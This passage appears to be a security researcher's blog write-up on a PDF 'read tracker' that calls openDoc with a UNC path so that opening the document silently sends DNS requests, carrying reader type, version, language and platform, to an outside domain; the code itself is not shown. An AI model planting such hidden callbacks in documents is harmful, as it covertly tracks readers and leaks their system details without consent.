In the code I dealt with, openDoc was passed the arguments “cPath”, “cFS” and “bHidden”. Below are the explanations on each argument:
- cPath – the location of the document/path
- cFS – the file system type to use
- bHidden – whether or not to open the document at that path
The code I encountered set the cPath to something like “\\your.domain.to.query\/path/
If executed, the document would not prompt the user and a stream of DNS requests would follow to the domain specified. What was nice about this read tracker was that it went further to collect some information about the client, but ultimately not all of it. I tooled this up for testing and included the following details to collect on:
- ViewerType – Type of viewer the user is reading (Adobe, Web, etc.)
- ViewVersion – Version of the PDF reader
- AppLanguage – The PDF reader’s configured language
- AppPlatform – Operating system used to open the PDF
I appended these to the actual DNS request so that it looked like this:
In the blog McAfee put out, they show HTTP traffic, but I was never able to get such details. There is possibly something I have missed or they are using a different call altogether or maybe Adobe 11 just handles this call differently. If you are interested in playing around with the code and a sample document, please email me or obtain the sample from VirusTotal.
I generated the sample using HeavyPint and the code mentioned above pictured above without any exploit, so it’s safe.